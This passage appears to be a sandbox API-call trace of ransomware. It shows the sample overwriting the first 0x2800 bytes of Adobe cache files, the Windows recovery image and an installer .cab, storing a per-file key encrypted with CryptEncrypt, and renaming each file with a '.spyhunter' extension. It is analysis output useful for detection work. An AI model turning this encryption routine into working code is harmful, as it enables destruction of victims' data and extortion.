nNumberOfBytesToWrite=0x49c, lpNumberOfBytesWritten=0x25cf5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf5cc*=0x49c, lpOverlapped=0x0) returned 1 [0130.140] GetProcessHeap () returned 0x2c0000 [0130.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.140] WriteFile (in: hFile=0x158, lpBuffer=0x25cf60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf60c*, lpNumberOfBytesWritten=0x25cf5cc*=0x4, lpOverlapped=0x0) returned 1 [0130.140] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf5cc*=0x30, lpOverlapped=0x0) returned 1 [0130.140] CloseHandle (hObject=0x158) returned 1 [0130.140] GetProcessHeap () returned 0x2c0000 [0130.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0130.140] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.spyhunter") returned 84 [0130.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst.spyhunter")) returned 1 [0130.146] GetProcessHeap () returned 0x2c0000 [0130.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0130.146] GetProcessHeap () returned 0x2c0000 [0130.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.146] GetProcessHeap () returned 0x2c0000 [0130.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4858 | out: hHeap=0x2c0000) returned 1 [0130.148] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf608 | out: pbBuffer=0x25cf608) returned 1 [0130.148] GetProcessHeap () returned 0x2c0000 [0130.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf600*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf600*=0x30) returned 1 [0130.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.149] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin") returned 80 [0130.149] StrStrW (lpFirst="UserCache.bin", lpSrch=".txt") returned 0x0 [0130.150] GetProcessHeap () returned 0x2c0000 [0130.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.150] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf5c4*=0x2800, lpOverlapped=0x0) returned 1 [0130.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.151] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf5c4*=0x2800, lpOverlapped=0x0) returned 1 [0130.151] GetProcessHeap () returned 0x2c0000 [0130.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.152] WriteFile (in: hFile=0x158, lpBuffer=0x25cf604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf604*, lpNumberOfBytesWritten=0x25cf5c4*=0x4, lpOverlapped=0x0) returned 1 [0130.153] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf5c4*=0x30, lpOverlapped=0x0) returned 1 [0130.153] CloseHandle (hObject=0x158) returned 1 [0130.153] GetProcessHeap () returned 0x2c0000 [0130.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0130.153] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.spyhunter") returned 90 [0130.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.spyhunter")) returned 1 [0130.154] GetProcessHeap () returned 0x2c0000 [0130.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0130.154] GetProcessHeap () returned 0x2c0000 [0130.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.154] GetProcessHeap () returned 0x2c0000 [0130.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d378 | out: hHeap=0x2c0000) returned 1 [0130.154] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf600 | out: pbBuffer=0x25cf600) returned 1 [0130.154] GetProcessHeap () returned 0x2c0000 [0130.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.155] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5f8*=0x30) returned 1 [0130.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents") returned 83 [0130.156] StrStrW (lpFirst="SharedDataEvents", lpSrch=".txt") returned 0x0 [0130.156] GetProcessHeap () returned 0x2c0000 [0130.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.156] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf5bc*=0x1400, lpOverlapped=0x0) returned 1 [0130.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.180] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf5bc*=0x1400, lpOverlapped=0x0) returned 1 [0130.180] GetProcessHeap () returned 0x2c0000 [0130.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.180] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf5fc*, lpNumberOfBytesWritten=0x25cf5bc*=0x4, lpOverlapped=0x0) returned 1 [0130.180] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf5bc*=0x30, lpOverlapped=0x0) returned 1 [0130.181] CloseHandle (hObject=0x158) returned 1 [0130.181] GetProcessHeap () returned 0x2c0000 [0130.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0130.181] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.spyhunter") returned 93 [0130.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.spyhunter")) returned 1 [0130.182] GetProcessHeap () returned 0x2c0000 [0130.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0130.182] GetProcessHeap () returned 0x2c0000 [0130.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.182] GetProcessHeap () returned 0x2c0000 [0130.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d288 | out: hHeap=0x2c0000) returned 1 [0130.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf600 | out: pbBuffer=0x25cf600) returned 1 [0130.182] GetProcessHeap () returned 0x2c0000 [0130.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5f8*=0x30) returned 1 [0130.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.183] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst") returned 84 [0130.183] StrStrW (lpFirst="AdobeSysFnt10.lst", lpSrch=".txt") returned 0x0 [0130.183] GetProcessHeap () returned 0x2c0000 [0130.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.183] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf5bc*=0x2800, lpOverlapped=0x0) returned 1 [0130.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.226] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf5bc*=0x2800, lpOverlapped=0x0) returned 1 [0130.227] GetProcessHeap () returned 0x2c0000 [0130.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.227] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.227] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf5fc*, lpNumberOfBytesWritten=0x25cf5bc*=0x4, lpOverlapped=0x0) returned 1 [0130.239] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf5bc*=0x30, lpOverlapped=0x0) returned 1 [0130.239] CloseHandle (hObject=0x158) returned 1 [0130.239] GetProcessHeap () returned 0x2c0000 [0130.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f83d18 [0130.240] wnsprintfW (in: pszDest=0x2f83d18, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.spyhunter") returned 94 [0130.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.spyhunter")) returned 1 [0130.240] GetProcessHeap () returned 0x2c0000 [0130.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f83d18 | out: hHeap=0x2c0000) returned 1 [0130.241] GetProcessHeap () returned 0x2c0000 [0130.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.241] GetProcessHeap () returned 0x2c0000 [0130.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38d50 | out: hHeap=0x2c0000) returned 1 [0130.241] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5f8 | out: pbBuffer=0x25cf5f8) returned 1 [0130.241] GetProcessHeap () returned 0x2c0000 [0130.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.241] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5f0*=0x30) returned 1 [0130.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.241] GetProcessHeap () returned 0x2c0000 [0130.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.241] GetProcessHeap () returned 0x2c0000 [0130.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33dfc0 | out: hHeap=0x2c0000) returned 1 [0130.241] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5f8 | out: pbBuffer=0x25cf5f8) returned 1 [0130.242] GetProcessHeap () returned 0x2c0000 [0130.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.242] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5f0*=0x30) returned 1 [0130.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.242] GetProcessHeap () returned 0x2c0000 [0130.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.242] GetProcessHeap () returned 0x2c0000 [0130.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a9a8 | out: hHeap=0x2c0000) returned 1 [0130.242] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5f0 | out: pbBuffer=0x25cf5f0) returned 1 [0130.242] GetProcessHeap () returned 0x2c0000 [0130.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.242] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5e8*=0x30) returned 1 [0130.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.242] GetProcessHeap () returned 0x2c0000 [0130.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.243] GetProcessHeap () returned 0x2c0000 [0130.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332e10 | out: hHeap=0x2c0000) returned 1 [0130.243] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5f0 | out: pbBuffer=0x25cf5f0) returned 1 [0130.243] GetProcessHeap () returned 0x2c0000 [0130.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.243] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5e8*=0x30) returned 1 [0130.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\." (normalized: "c:\\users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.243] GetProcessHeap () returned 0x2c0000 [0130.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.243] GetProcessHeap () returned 0x2c0000 [0130.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332da8 | out: hHeap=0x2c0000) returned 1 [0130.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5e0 | out: pbBuffer=0x25cf5e0) returned 1 [0130.246] GetProcessHeap () returned 0x2c0000 [0130.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5d8*=0x30) returned 1 [0130.246] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.249] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 62 [0130.249] StrStrW (lpFirst="Winre.wim", lpSrch=".txt") returned 0x0 [0130.249] GetProcessHeap () returned 0x2c0000 [0130.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.250] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf59c*=0x2800, lpOverlapped=0x0) returned 1 [0130.304] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.304] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf59c*=0x2800, lpOverlapped=0x0) returned 1 [0130.320] GetProcessHeap () returned 0x2c0000 [0130.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.320] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.320] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5dc*, lpNumberOfBytesWritten=0x25cf59c*=0x4, lpOverlapped=0x0) returned 1 [0130.537] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf59c*=0x30, lpOverlapped=0x0) returned 1 [0130.537] CloseHandle (hObject=0x158) returned 1 [0130.555] GetProcessHeap () returned 0x2c0000 [0130.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.555] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.spyhunter") returned 72 [0130.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.spyhunter" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.spyhunter")) returned 1 [0130.556] GetProcessHeap () returned 0x2c0000 [0130.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.556] GetProcessHeap () returned 0x2c0000 [0130.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0130.556] GetProcessHeap () returned 0x2c0000 [0130.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c850a0 | out: hHeap=0x2c0000) returned 1 [0130.556] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5e0 | out: pbBuffer=0x25cf5e0) returned 1 [0130.556] GetProcessHeap () returned 0x2c0000 [0130.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0130.556] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5d8*=0x30) returned 1 [0130.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0130.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0130.635] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0130.635] GetProcessHeap () returned 0x2c0000 [0130.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.635] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf59c*=0x2800, lpOverlapped=0x0) returned 1 [0131.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 